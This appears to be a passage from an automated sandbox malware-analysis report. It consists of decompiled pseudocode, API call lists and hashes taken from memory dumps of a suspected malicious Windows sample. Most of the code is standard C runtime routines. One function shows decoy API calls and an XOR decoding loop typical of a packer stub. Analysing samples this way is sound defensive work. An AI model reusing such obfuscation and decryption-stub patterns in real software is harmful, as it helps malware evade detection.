    					if( *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) + 0x10)) >= 0x10) {
    						 *((intOrPtr*)(_t100 - 0x6c)) = 0x10;
    					} else {
    						_t6 =  *((intOrPtr*)(_t100 + 0xc)) + 0x10; // 0x2
    						 *((intOrPtr*)(_t100 - 0x6c)) =  *_t6;
    					}
    					if( *(_t100 - 4) >=  *((intOrPtr*)(_t100 - 0x6c))) {
    						break;
    					}
    					L5:
    					 *(_t100 - 0x61) =  *((intOrPtr*)( *((intOrPtr*)(_t100 + 0xc)) +  *(_t100 - 4) + 0x20));
    					if(E00B7C680(_t100 - 0x60) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t100 - 0x60))) + 0xac)) <= 1) {
    						_t54 = E00B8C610(E00B7C680(_t100 - 0x60),  *(_t100 - 0x61) & 0x000000ff, 0x157);
    						_t105 = _t102 + 0xc;
    						 *((intOrPtr*)(_t100 - 0x70)) = _t54;
    					} else {
    						_t68 = E00B8C6C0( *(_t100 - 0x61) & 0x000000ff, 0x157, E00B7C680(_t100 - 0x60));
    						_t105 = _t102 + 0xc;
    						 *((intOrPtr*)(_t100 - 0x70)) = _t68;
    					}
    					if( *((intOrPtr*)(_t100 - 0x70)) == 0) {
    						 *(_t100 - 0x74) = 0x20;
    					} else {
    						 *(_t100 - 0x74) =  *(_t100 - 0x61) & 0x000000ff;
    					}
    					 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) =  *(_t100 - 0x74);
    					 *((intOrPtr*)(_t100 - 0x68)) =  *((intOrPtr*)(L00B80C60( *(_t100 - 0x74))));
    					 *((intOrPtr*)(L00B80C60( *(_t100 - 0x74)))) = 0;
    					_t84 = _t100 +  *(_t100 - 4) * 3 - 0x3c;
    					_t61 = E00B8C5B0(_t100 +  *(_t100 - 4) * 3 - 0x3c, _t100 +  *(_t100 - 4) * 3 - 0x3c, 0x31 -  *(_t100 - 4) * 3, "%.2X ",  *(_t100 - 0x61) & 0x000000ff);
    					_t102 = _t105 + 0x10;
    					if(_t61 < 0) {
    						E00B7DC00( *((intOrPtr*)(L00B80C60(_t84))), 0x16, 0x22, L"(*_errno())", L"_printMemBlockData", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c", 0x963, 0);
    						_t102 = _t102 + 0x20;
    					}
    					 *((intOrPtr*)(L00B80C60(_t84))) =  *((intOrPtr*)(_t100 - 0x68));
    				}
    				L15:
    				_t91 =  *(_t100 - 4);
    				 *((char*)(_t100 +  *(_t100 - 4) - 0x50)) = 0;
    				_push(_t100 - 0x3c);
    				if(L00B89ED0(0, 0, 0, 0, " Data: <%s> %s\n", _t100 - 0x50) == 1) {
    					asm("int3");
    				}
    				return E00B805D0(E00B7C650(_t100 - 0x60), _t70,  *(_t100 - 8) ^ _t100, _t91, _t98, _t99);
    			}












    0x00b7fec7
    0x00b7fec7
    0x00b7fec7
    0x00b7fecd
    0x00b7fed7
    0x00b7fee4
    0x00b7fed9
    0x00b7fedc
    0x00b7fedf
    0x00b7fedf
    0x00b7fef1
    0x00000000
    0x00000000
    0x00b7fef7
    0x00b7ff00
    0x00b7ff0d
    0x00b7ff55
    0x00b7ff5a
    0x00b7ff5d
    0x00b7ff22
    0x00b7ff35
    0x00b7ff3a
    0x00b7ff3d
    0x00b7ff3d
    0x00b7ff64
    0x00b7ff6f
    0x00b7ff66
    0x00b7ff6a
    0x00b7ff6a
    0x00b7ff7c
    0x00b7ff87
    0x00b7ff8f
    0x00b7ffb3
    0x00b7ffb8
    0x00b7ffbd
    0x00b7ffc2
    0x00b7ffe6
    0x00b7ffeb
    0x00b7ffeb
    0x00b7fff6
    0x00b7fff6
    0x00b7fffd
    0x00b7fffd
    0x00b80000
    0x00b80008
    0x00b80025
    0x00b80027
    0x00b80027
    0x00b8003d

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: __invoke_watson_if_oneof__isctype_l_swprintf_s
    • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
    • API String ID: 4289034949-3158630120
    • Opcode ID: 8544851ad210d3750d61fb086007976f2218ad33485cb09c83d8a1cc5107de36
    • Instruction ID: 94309a65b287751b391181f586fbc45b1f2a3413625fdad8a2fc99bdf67bde03
    • Opcode Fuzzy Hash: 8544851ad210d3750d61fb086007976f2218ad33485cb09c83d8a1cc5107de36
    • Instruction Fuzzy Hash: 26319070905309DFDB04EFA4C991ABDBBF2EF55700F2085E8E4296F292DB309A05CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00B78800(long _a4) {
    				int _v8;
    				struct _OSVERSIONINFOEXW* _v12;
    				void* _v16;
    				int _t16;
    				void* _t17;
    				void* _t29;
    
    				_t16 =  *0xd12fe0; // 0x34a5040
    				_v8 = _t16;
    				_v12 = 0;
    				while(_v12 < 0x1b82) {
    					if( *0xd15000 == 0x5188) {
    						_t29 =  *0xd12fe0; // 0x34a5040
    						__imp__CreateFileTransactedW(L"shine!", 0x80000000, 0, 0, 0, 0, 0, 0, 0, _t29);
    						_v16 = _t16;
    						_t17 =  *0xd12fe0; // 0x34a5040
    						CreateFiber(_a4, 0, _t17);
    						_t16 = WaitCommEvent(_v16,  &_a4, 0);
    						if(_t16 == 0) {
    							ClearCommBreak(_v16);
    							CloseHandle(0);
    							_push(0);
    							_t16 = VerifyVersionInfoW(0, 1, 0);
    						}
    					}
    					if(_v12 == 0x19) {
    						_t16 = _v8 + _a4;
    						 *((char*)(_v8 + _a4)) =  *_t16 & 0x000000ff ^  *0xd12318 & 0x000000ff;
    					}
    					_v12 =  &(_v12->dwOSVersionInfoSize);
    				}
    				return _t16;
    			}









    0x00b78806
    0x00b7880b
    0x00b7880e
    0x00b78820
    0x00b78837
    0x00b78839
    0x00b78858
    0x00b7885e
    0x00b78861
    0x00b7886d
    0x00b7887d
    0x00b78885
    0x00b7888b
    0x00b78893
    0x00b78899
    0x00b788a1
    0x00b788a1
    0x00b78885
    0x00b788ab
    0x00b788b7
    0x00b788c5
    0x00b788c5
    0x00b7881d
    0x00b7881d
    0x00b788cf

    APIs
    • CreateFileTransactedW.KERNEL32(shine!,80000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,034A5040), ref: 00B78858
    • CreateFiber.KERNEL32(00001B82,00000000,034A5040), ref: 00B7886D
    • WaitCommEvent.KERNEL32(?,00001B82,00000000), ref: 00B7887D
    • ClearCommBreak.KERNEL32(?), ref: 00B7888B
    • CloseHandle.KERNEL32(00000000), ref: 00B78893
    • VerifyVersionInfoW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00B788A1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: CommCreate$BreakClearCloseEventFiberFileHandleInfoTransactedVerifyVersionWait
    • String ID: shine!
    • API String ID: 1570665561-3316790111
    • Opcode ID: 9d3b1765566d41c6760e27f0c0d2fa944aa302a0e9f9b831c188af96e1ebc62d
    • Instruction ID: 433c0d9c6186ed38d44b79debe560636a9de00d928d6c1d46c211dfe8649cf9d
    • Opcode Fuzzy Hash: 9d3b1765566d41c6760e27f0c0d2fa944aa302a0e9f9b831c188af96e1ebc62d
    • Instruction Fuzzy Hash: 2C219A70A40344FBDB10CFA8DC89FAC7BB4FB44705F14C488E619AB294CB709A80DB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E00B95717() {
    				signed int _t499;
    				void* _t504;
    				signed int _t506;
    				void* _t526;
    				void* _t528;
    				signed int _t536;
    				void* _t555;
    				void* _t556;
    				signed int _t557;
    				void* _t559;
    
    				L0:
    				while(1) {
    					L0:
    					 *((intOrPtr*)(_t557 - 0x260)) = 0x27;
    					while(1) {
    						L148:
    						 *(__ebp - 8) = 0x10;
    						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    						__eflags =  *(__ebp - 0x10) & 0x00000080;
    						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    							 *(__ebp - 0x14) = 0x30;
    							 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    							__eflags =  *(__ebp - 0x260) + 0x51;
    							 *((char*)(__ebp - 0x13)) = __al;
    							 *(__ebp - 0x1c) = 2;
    						}
    						while(1) {
    							L153:
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    							__eflags =  *(__ebp - 0x10) & 0x00008000;
    							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    								__eflags =  *(__ebp - 0x10) & 0x00001000;
    								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    									__eflags =  *(__ebp - 0x10) & 0x00000020;
    									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    										__eflags =  *(__ebp - 0x10) & 0x00000040;
    										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    											__ecx = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											__edx = 0;
    											__eflags = 0;
    											 *(__ebp - 0x2b8) = __eax;
    											 *(__ebp - 0x2b4) = 0;
    										} else {
    											__eax = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											asm("cdq");
    											 *(__ebp - 0x2b8) = __eax;
    											 *(__ebp - 0x2b4) = __edx;
    										}
    									} else {
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    										__eflags =  *(__ebp - 0x10) & 0x00000040;
    										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    											__ecx = __ebp + 0x14;
    											E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    											asm("cdq");
    											 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    											 *(__ebp - 0x2b4) = __edx;
    										} else {
    											__eax = __ebp + 0x14;
    											__eax = E00B93D50(__ebp + 0x14);
    											__ax = __eax;
    											asm("cdq");
    											 *(__ebp - 0x2b8) = __eax;
    											 *(__ebp - 0x2b4) = __edx;
    										}
    									}
    								} else {
    									__eax = __ebp + 0x14;
    									 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    									 *(__ebp - 0x2b4) = __edx;
    								}
    							} else {
    								__ecx = __ebp + 0x14;
    								 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    								 *(__ebp - 0x2b4) = __edx;
    							}
    							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    							__eflags =  *(__ebp - 0x10) & 0x00000040;
    							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    								goto L170;
    							}
    							L166:
    							__eflags =  *(__ebp - 0x2b4);
    							if(__eflags > 0) {
    								goto L170;
    							}
    							L167:
    							if(__eflags < 0) {
    								L169:
    								 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
    								__edx =  *(__ebp - 0x2b4);
    								asm("adc edx, 0x0");
    								__edx =  ~( *(__ebp - 0x2b4));
    								 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
    								 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    								L171:
    								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    								__eflags =  *(__ebp - 0x10) & 0x00008000;
    								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    									__eflags =  *(__ebp - 0x10) & 0x00001000;
    									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    										__edx =  *(__ebp - 0x2c0);
    										__eax =  *(__ebp - 0x2bc);
    										__eax =  *(__ebp - 0x2bc) & 0x00000000;
    										__eflags = __eax;
    										 *(__ebp - 0x2bc) = __eax;
    									}
    								}
    								__eflags =  *(__ebp - 0x30);
    								if( *(__ebp - 0x30) >= 0) {
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    									__eflags =  *(__ebp - 0x30) - 0x200;
    									if( *(__ebp - 0x30) > 0x200) {
    										 *(__ebp - 0x30) = 0x200;
    									}
    								} else {
    									 *(__ebp - 0x30) = 1;
    								}
    								 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    								__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    								if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    									 *(__ebp - 0x1c) = 0;
    								}
    								__eax = __ebp - 0x49;
    								 *(__ebp - 4) = __ebp - 0x49;
    								while(1) {
    									L181:
    									__ecx =  *(__ebp - 0x30);
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    									__eflags =  *(__ebp - 0x30);
    									if( *(__ebp - 0x30) > 0) {
    										goto L183;
    									}
    									L182:
    									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    										L186:
    										__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
    										 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
    										__ecx =  *(__ebp - 4);
    										__ecx =  *(__ebp - 4) + 1;
    										 *(__ebp - 4) = __ecx;
    										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    										__eflags =  *(__ebp - 0x10) & 0x00000200;
    										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
    											while(1) {
    												L190:
    												__eflags =  *(__ebp - 0x28);
    												if( *(__ebp - 0x28) != 0) {
    													goto L216;
    												}
    												L191:
    												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    												__eflags =  *(__ebp - 0x10) & 0x00000040;
    												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
    													__eflags =  *(__ebp - 0x10) & 0x00000100;
    													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
    														__eflags =  *(__ebp - 0x10) & 0x00000001;
    														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
    															__eflags =  *(__ebp - 0x10) & 0x00000002;
    															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
    																 *(__ebp - 0x14) = 0x20;
    																 *(__ebp - 0x1c) = 1;
    															}
    														} else {
    															 *(__ebp - 0x14) = 0x2b;
    															 *(__ebp - 0x1c) = 1;
    														}
    													} else {
    														 *(__ebp - 0x14) = 0x2d;
    														 *(__ebp - 0x1c) = 1;
    													}
    												}
    												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
    												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    												 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
    												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
    												__eflags =  *(__ebp - 0x10) & 0x0000000c;
    												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
    													__edx = __ebp - 0x24c;
    													__eax =  *(__ebp + 8);
    													__ecx =  *(__ebp - 0x2c4);
    													__eax = E00B95E80(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    												}
    												__edx = __ebp - 0x24c;
    												__eax =  *(__ebp + 8);
    												__ecx =  *(__ebp - 0x1c);
    												__edx = __ebp - 0x14;
    												E00B95EC0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
    												__eax =  *(__ebp - 0x10) & 0x00000008;
    												__eflags =  *(__ebp - 0x10) & 0x00000008;
    												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    													__eflags =  *(__ebp - 0x10) & 0x00000004;
    													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
    														__edx = __ebp - 0x24c;
    														__eax =  *(__ebp + 8);
    														__ecx =  *(__ebp - 0x2c4);
    														__eax = E00B95E80(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    													}
    												}
    												__eflags =  *(__ebp - 0xc);
    												if( *(__ebp - 0xc) == 0) {
    													L212:
    													__ecx = __ebp - 0x24c;
    													__edx =  *(__ebp + 8);
    													__eax =  *(__ebp - 0x24);
    													__ecx =  *(__ebp - 4);
    													__eax = E00B95EC0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
    													goto L213;
    												} else {
    													L204:
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) <= 0) {
    														goto L212;
    													}
    													L205:
    													 *(__ebp - 0x2dc) = 0;
    													__edx =  *(__ebp - 4);
    													 *(__ebp - 0x2c8) =  *(__ebp - 4);
    													__eax =  *(__ebp - 0x24);
    													 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
    													while(1) {
    														L206:
    														__ecx =  *(__ebp - 0x2cc);
    														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
    														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
    														__eflags = __ecx;
    														if(__ecx == 0) {
    															break;
    														}
    														L207:
    														__eax =  *(__ebp - 0x2c8);
    														 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
    														__edx =  *(__ebp - 0x32e) & 0x0000ffff;
    														__eax = __ebp - 0x2d8;
    														__ecx = __ebp - 0x2d0;
    														 *(__ebp - 0x2dc) = E00B97890(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
    														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
    														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
    														__eflags =  *(__ebp - 0x2dc);
    														if( *(__ebp - 0x2dc) != 0) {
    															L209:
    															 *(__ebp - 0x24c) = 0xffffffff;
    															break;
    														}
    														L208:
    														__eflags =  *(__ebp - 0x2d0);
    														if( *(__ebp - 0x2d0) != 0) {
    															L210:
    															__eax = __ebp - 0x24c;
    															__ecx =  *(__ebp + 8);
    															__edx =  *(__ebp - 0x2d0);
    															__ebp - 0x2d8 = E00B95EC0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
    															continue;
    														}
    														goto L209;
    													}
    													L211:
    													L213:
    													__eflags =  *(__ebp - 0x24c);
    													if( *(__ebp - 0x24c) >= 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
    														__eflags =  *(__ebp - 0x10) & 0x00000004;
    														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
    															__eax = __ebp - 0x24c;
    															__ecx =  *(__ebp + 8);
    															__edx =  *(__ebp - 0x2c4);
    															__eax = E00B95E80(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
    														}
    													}
    												}
    												L216:
    												__eflags =  *(__ebp - 0x20);
    												if( *(__ebp - 0x20) != 0) {
    													 *(__ebp - 0x20) = L00B7EB20( *(__ebp - 0x20), 2);
    													 *(__ebp - 0x20) = 0;
    												}
    												while(1) {
    													L218:
    													 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
    													_t547 =  *(_t557 - 0x251);
    													 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
    													if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
    														break;
    													} else {
    														if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
    															 *(_t557 - 0x310) = 0;
    														} else {
    															 *(_t557 - 0x310) =  *( *(_t557 - 0x251) +  &M00B77B58) & 0xf;
    														}
    													}
    													L7:
    													 *(_t557 - 0x250) =  *(_t557 - 0x310);
    													_t506 =  *(_t557 - 0x250) * 9;
    													_t536 =  *(_t557 - 0x25c);
    													_t547 = ( *(_t506 + _t536 + 0xb77b78) & 0x000000ff) >> 4;
    													 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0xb77b78) & 0x000000ff) >> 4;
    													if( *(_t557 - 0x25c) != 8) {
    														L16:
    														 *(_t557 - 0x318) =  *(_t557 - 0x25c);
    														__eflags =  *(_t557 - 0x318) - 7;
    														if( *(_t557 - 0x318) > 7) {
    															continue;
    														}
    														L17:
    														switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M00B95CD0))) {
    															case 0:
    																L18:
    																 *(_t557 - 0xc) = 0;
    																_t509 = E00B91090( *(_t557 - 0x251) & 0x000000ff, E00B7C680(_t557 - 0x40));
    																_t562 = _t559 + 8;
    																__eflags = _t509;
    																if(_t509 == 0) {
    																	L24:
    																	E00B95DE0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
    																	_t559 = _t562 + 0xc;
    																	goto L218;
    																} else {
    																	E00B95DE0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
    																	_t562 = _t562 + 0xc;
    																	_t541 =  *( *(_t557 + 0xc));
    																	 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
    																	_t547 =  *(_t557 + 0xc) + 1;
    																	__eflags = _t547;
    																	 *(_t557 + 0xc) = _t547;
    																	asm("sbb eax, eax");
    																	 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
    																	if(_t547 == 0) {
    																		_push(L"(ch != _T(\'\\0\'))");
    																		_push(0);
    																		_push(0x486);
    																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																		_push(2);
    																		_t521 = L00B7D760();
    																		_t562 = _t562 + 0x14;
    																		__eflags = _t521 - 1;
    																		if(_t521 == 1) {
    																			asm("int3");
    																		}
    																	}
    																	L22:
    																	__eflags =  *(_t557 - 0x27c);
    																	if( *(_t557 - 0x27c) != 0) {
    																		goto L24;
    																	} else {
    																		 *((intOrPtr*)(L00B80C60(_t541))) = 0x16;
    																		E00B809F0(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    																		 *(_t557 - 0x2f4) = 0xffffffff;
    																		E00B7C650(_t557 - 0x40);
    																		_t499 =  *(_t557 - 0x2f4);
    																		goto L229;
    																	}
    																}
    															case 1:
    																L25:
    																 *(__ebp - 0x2c) = 0;
    																__edx =  *(__ebp - 0x2c);
    																 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    																__eax =  *(__ebp - 0x28);
    																 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																__ecx =  *(__ebp - 0x18);
    																 *(__ebp - 0x1c) = __ecx;
    																 *(__ebp - 0x10) = 0;
    																 *(__ebp - 0x30) = 0xffffffff;
    																 *(__ebp - 0xc) = 0;
    																goto L218;
    															case 2:
    																L26:
    																__edx =  *((char*)(__ebp - 0x251));
    																 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    																__eflags =  *(__ebp - 0x31c) - 0x10;
    																if( *(__ebp - 0x31c) > 0x10) {
    																	goto L33;
    																}
    																L27:
    																__ecx =  *(__ebp - 0x31c);
    																_t72 = __ecx + 0xb95d08; // 0x498d04
    																__edx =  *_t72 & 0x000000ff;
    																switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00B95CF0))) {
    																	case 0:
    																		goto L30;
    																	case 1:
    																		goto L31;
    																	case 2:
    																		goto L29;
    																	case 3:
    																		goto L28;
    																	case 4:
    																		goto L32;
    																	case 5:
    																		goto L33;
    																}
    															case 3:
    																L34:
    																__edx =  *((char*)(__ebp - 0x251));
    																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    																if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																	__eax =  *(__ebp - 0x18);
    																	__eax =  *(__ebp - 0x18) * 0xa;
    																	__eflags = __eax;
    																	__ecx =  *((char*)(__ebp - 0x251));
    																	_t96 = __ecx - 0x30; // -48
    																	__edx = __eax + _t96;
    																	 *(__ebp - 0x18) = __eax + _t96;
    																} else {
    																	__eax = __ebp + 0x14;
    																	 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																	__eflags =  *(__ebp - 0x18);
    																	if( *(__ebp - 0x18) < 0) {
    																		__ecx =  *(__ebp - 0x10);
    																		__ecx =  *(__ebp - 0x10) | 0x00000004;
    																		__eflags = __ecx;
    																		 *(__ebp - 0x10) = __ecx;
    																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    																	}
    																}
    																goto L218;
    															case 4:
    																L40:
    																 *(__ebp - 0x30) = 0;
    																goto L218;
    															case 5:
    																L41:
    																__eax =  *((char*)(__ebp - 0x251));
    																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    																if( *((char*)(__ebp - 0x251)) != 0x2a) {
    																	__edx =  *(__ebp - 0x30);
    																	__edx =  *(__ebp - 0x30) * 0xa;
    																	__eflags = __edx;
    																	_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    																	__ecx = __edx + _t107;
    																	 *(__ebp - 0x30) = __ecx;
    																} else {
    																	__ecx = __ebp + 0x14;
    																	 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																	__eflags =  *(__ebp - 0x30);
    																	if( *(__ebp - 0x30) < 0) {
    																		 *(__ebp - 0x30) = 0xffffffff;
    																	}
    																}
    																goto L218;
    															case 6:
    																L47:
    																__edx =  *((char*)(__ebp - 0x251));
    																 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    																__eflags =  *(__ebp - 0x320) - 0x2e;
    																if( *(__ebp - 0x320) > 0x2e) {
    																	L70:
    																	goto L218;
    																}
    																L48:
    																__ecx =  *(__ebp - 0x320);
    																_t115 = __ecx + 0xb95d30; // 0x553e9003
    																__edx =  *_t115 & 0x000000ff;
    																switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M00B95D1C))) {
    																	case 0:
    																		L53:
    																		__edx =  *(__ebp + 0xc);
    																		__eax =  *( *(__ebp + 0xc));
    																		__eflags =  *( *(__ebp + 0xc)) - 0x36;
    																		if( *( *(__ebp + 0xc)) != 0x36) {
    																			L56:
    																			__edx =  *(__ebp + 0xc);
    																			__eax =  *( *(__ebp + 0xc));
    																			__eflags =  *( *(__ebp + 0xc)) - 0x33;
    																			if( *( *(__ebp + 0xc)) != 0x33) {
    																				L59:
    																				__edx =  *(__ebp + 0xc);
    																				__eax =  *( *(__ebp + 0xc));
    																				__eflags =  *( *(__ebp + 0xc)) - 0x64;
    																				if( *( *(__ebp + 0xc)) == 0x64) {
    																					L65:
    																					L67:
    																					goto L70;
    																				}
    																				L60:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *__ecx;
    																				__eflags =  *__ecx - 0x69;
    																				if( *__ecx == 0x69) {
    																					goto L65;
    																				}
    																				L61:
    																				__eax =  *(__ebp + 0xc);
    																				__ecx =  *( *(__ebp + 0xc));
    																				__eflags = __ecx - 0x6f;
    																				if(__ecx == 0x6f) {
    																					goto L65;
    																				}
    																				L62:
    																				__edx =  *(__ebp + 0xc);
    																				__eax =  *( *(__ebp + 0xc));
    																				__eflags =  *( *(__ebp + 0xc)) - 0x75;
    																				if( *( *(__ebp + 0xc)) == 0x75) {
    																					goto L65;
    																				}
    																				L63:
    																				__ecx =  *(__ebp + 0xc);
    																				__edx =  *__ecx;
    																				__eflags =  *__ecx - 0x78;
